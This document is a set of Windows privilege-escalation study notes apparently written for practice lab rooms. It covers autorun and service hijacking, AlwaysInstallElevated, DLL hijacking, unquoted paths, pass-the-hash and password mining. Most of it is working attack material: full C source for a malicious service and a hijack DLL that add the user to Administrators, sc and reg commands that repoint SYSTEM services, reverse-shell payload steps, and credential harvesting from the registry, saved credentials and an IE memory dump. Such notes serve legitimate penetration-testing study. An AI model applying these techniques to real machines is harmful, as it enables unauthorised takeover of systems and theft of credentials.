Rooms

• Windows PrivEsc Arena
• Windows PrivEsc

Be flexible and diligent in your checks. Most of these are just examples and you don't have to follow them word-for-word. Check other services, other files, other registry keys, use these as an example.

Registry

Autorun

Method 1: Registry

• Check for autorun programs

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

• If there are any autorun programs, you may be able to overwrite the binary
• Use the accesschk.exe or icacls to check your permissions on this directory
  • accesschk.exe /accepteula -wvu C:\Program Files\Autorun Program\
  • If any of the files are writable, can overwrite with a reverse shell payload
  • When an administrative user logs on, we can get an elevated shell
  • Need to have listener running continuously to catch logons

AlwaysInstallElevated

• Check if the AlwaysInstallElevated setting has been enabled

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

reg query HKCU\Software\Policies\Microsoft\Windows\Installer

• If either of those queries return 1, can get an elevated shell
• Use msfvenom to create an .msi payload and run it on the target
  • Start a listener
  • Run this commamnd to install the malicious program

msiexec /quiet /qn /i <path to msi>

Services

HKLM:\System\CurrentControlSet\services\regsvc

• Open PowerShell and check your permissions on this regitry key

Get-Acl hklm:\System\CurrentControlSet\services\regsvc

• If your user accout or a group you're a member of can register services, then you can create a malicious service to perform a privileged task
• Create a dummy Windows service
  • An example service is shown below
    • Modify the source code here
    • Enter the command in system()
  • Use the command cmd.exe /k net localgroup administrators user /add
  • This will add the current user to the Administrators local group
• In Kali, compile the .c code to a .exe

x86_64-w64-mingw32-gcc windows_service.c -o privesc.exe

• Transfer privesc.exe to a writable folder on the target
• Register the service

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d [C:\Path\to\privesc.exe] /f

• Start the service

sc.exe start regsvc

• Confirm the current user has been added to the local administrator group

windows_service.c

#include <windows.h>  
#include <stdio.h>  
  
#define SLEEP_TIME 5000  
  
SERVICE_STATUS ServiceStatus;    
SERVICE_STATUS_HANDLE hStatus;    
   
void ServiceMain(int argc, char** argv);    
void ControlHandler(DWORD request);    
  
//add the payload here  
int Run()    
{    
   system("cmd.exe /k net localgroup administrators user /add");  
   return 0;    
}    
  
int main()    
{    
   SERVICE_TABLE_ENTRY ServiceTable[2];  
   ServiceTable[0].lpServiceName = "MyService";  
   ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;  
  
   ServiceTable[1].lpServiceName = NULL;  
   ServiceTable[1].lpServiceProc = NULL;  
   
   StartServiceCtrlDispatcher(ServiceTable);     
   return 0;  
}  
  
void ServiceMain(int argc, char** argv)    
{    
   ServiceStatus.dwServiceType        = SERVICE_WIN32;    
   ServiceStatus.dwCurrentState       = SERVICE_START_PENDING;    
   ServiceStatus.dwControlsAccepted   = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN  
;  
   ServiceStatus.dwWin32ExitCode      = 0;    
   ServiceStatus.dwServiceSpecificExitCode = 0;    
   ServiceStatus.dwCheckPoint         = 0;    
   ServiceStatus.dwWaitHint           = 0;    
   
   hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandl  
er);    
   Run();    
      
   ServiceStatus.dwCurrentState = SERVICE_RUNNING;    
   SetServiceStatus (hStatus, &ServiceStatus);  
   
   while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)  
   {  
               Sleep(SLEEP_TIME);  
   }  
   return;    
}  
  
void ControlHandler(DWORD request)    
{    
   switch(request)    
   {    
       case SERVICE_CONTROL_STOP:    
                       ServiceStatus.dwWin32ExitCode = 0;    
           ServiceStatus.dwCurrentState  = SERVICE_STOPPED;    
           SetServiceStatus (hStatus, &ServiceStatus);  
           return;    
   
       case SERVICE_CONTROL_SHUTDOWN:    
           ServiceStatus.dwWin32ExitCode = 0;    
           ServiceStatus.dwCurrentState  = SERVICE_STOPPED;    
           SetServiceStatus (hStatus, &ServiceStatus);  
           return;    
          
       default:  
           break;  
   }    
   SetServiceStatus (hStatus,  &ServiceStatus);  
   return;    
}

File Permissions Service

• You can follow this process on other services as well
  • The File Permissions Service is just used here as an example
• Check the configuration of filepermsvc

sc.exe qc filepermsvc

• Note that it runs as SYSTEM
• See if you or a group you're in can modify the service

accesschk64.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

• For example, if Everyone has FILE_ALL_ACCESS, you can overwrite the service binary, so when the service starts, the malicious binary is run
• Using the windows_service.c service from before
  • Or, could be a reverse shell to spawn a SYSTEM shell
  • Copy privesc.exe as C:\Program Files\File Permissions Service\filepermservice.exe
• Run this command to restart the service

sc.exe stop filepermsvc && start filepermsvc

• Current user should have been added to local administrator group

DLL Hijacking

• In this example, a service loads a DLL from a directory where we have write permissions
  • We can determine this by running procmon on the target
  • Or by running the executable copied from the target on a test machine
• We can create a malicious DLL that will be loaded by the service instead
  • Compile the C code to DLL on Kali:

x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijacked.dll

• Copy the DLL to the target path
• Start the service

sc.exe start <service>

Example DLL Code

// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll  
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll  
  
#include <windows.h>  
  
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {  
   if (dwReason == DLL_PROCESS_ATTACH) {  
       system("cmd.exe /k net localgroup administrators user /add");  
       ExitProcess(0);  
   }  
   return TRUE;  
}

Insecure Service Permissions

• Similar to the File Permissions Service attack before
• Check a service's permissions to see if we can modify it
  • In this example, we're checking daclsvc , but other services should be checked as well

accesschk.exe /accepteula -uwcqv daclsvc

accesschk64.exe /accepteula -wuvc daclsvc

• Query the service to see if it runs as System

sc.exe qc daclsvc

• If we have SERVICE_CHANGE_CONFIG, we can manipulate a service

sc.exe config daclsvc binpath= "net localgroup administrators user /add"

sc start daclsvc

• This will add the current user to the local Administrators group when the service is started or restarted

Unquoted Service Path

• sc.exe qc <service> to query a service
• Especially useful if a service is running as NT Authority\SYSTEM
• If a service's BINARY_PATH_NAME is not wrapped in quotes
  • Example: C:\Program Files\Service Directory\awesome.exe
  • We need to find if any part of that path is writable
  • If C:\ is writable, we can create a Program.exe payload
  • If C:\Program Files\ is writable, we can a create Service.exe payload
  • If C:\Program Files\Service Directory\ is writable, we can create an awesome.exe payload

Startup Applications

• In a lower privileged shell, run

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

• If BUILTIN\Users has (F), we can add a payload there
• Use msfvenom to generate a reverse shell exe payload
• Put the payload in the folder
• Start a listener
• Wait for an admin to login

Passing the Hash

pth-winexe

• pth-winexe -U 'username%hash' //MACHINE_IP cmd.exe
• If you have a hash of a user
• This is just an example, I've written more notes here on passing the hash

Scheduled Tasks

• Check for scheduled tasks running as privileged accounts
• If the task is running a script, check the permissions on the script

accesschk.exe /accepteula -quvw user C:\path\to\script

• May be able to overwrite or modify the script contents
• Could run a command or reverse shell

Hot Potato

Invoke-Tater

• Invoke-Tater.ps1
• If the host is vulnerable to the Hot Potato privilege escalation, will run commands as System , as we will be able to impersonate the SYSTEM account
• Import the script

Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add

• Current user should now be a member of the local administrators group

Password Mining

Registry

• Search for the word password recursively

reg query HKLM /f password /t REG_SZ /s

• Might be something here as a quick search

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

• Spawn an admin shell from Kali

winexe -U 'username%password' //target-ip cmd.exe

• This is just an example. I've written more notes here on passing the password.

cmdkey

• cmdkey /list to list any saved credentials
• Start a reverse shell as the user

runas /savecred /user:username C:\PrivEsc\reverse.exe

C:\Windows\Panther\Unattend.xml

• Check the <Password> property for a base64 encoded password

Internet Explorer Memory Dump

• Start msfconsole

use auxiliary/server/capture/http_basic
set uripath pwn
run

• Victim
  • Open Internet Explorer
  • Go to http://kali-ip/pwn
  • Open Task Manager
  • Right-click iexpore.exe > Image Name > Create Dump File
  • Transfer the .DMP file to Kali
• Kali
  • Check if there are any saved credentials in the IE dump

strings file.DMP | grep "Authorization: Basic"

• If so, decode the base64 string.

echo -ne "base64string" | base64 -d

GUI Apps

Run as Admin

• If a GUI app is set to run as admin at launch
  • Example: MS Paint
    • Launch Paint
      • File > Open
      • Enter file://C:/Windows/System32/cmd.exe

Kernel Exploits

Scripts

• Can run exploit suggesting scripts to detect kernel exploits
• winPEASany.exe
• Seatbelt.exe
• PowerUp.ps1
• SharpUp.exe